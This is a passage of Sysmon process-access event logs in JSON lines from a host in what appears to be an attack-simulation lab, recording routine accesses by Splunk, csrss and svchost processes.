AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010CB800500}","ParentProcessId":"2864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010CB800500}\r\nSourceProcessId: 2864\r\nSourceThreadId: 4648\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00108C810500}\r\nTargetProcessId: 3120\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010CB800500}","SourceProcessId":"2864","SourceThreadId":"4648","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108C810500}","TargetProcessId":"3120","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00108C810500}\r\nTargetProcessId: 3120\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108C810500}","TargetProcessId":"3120","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 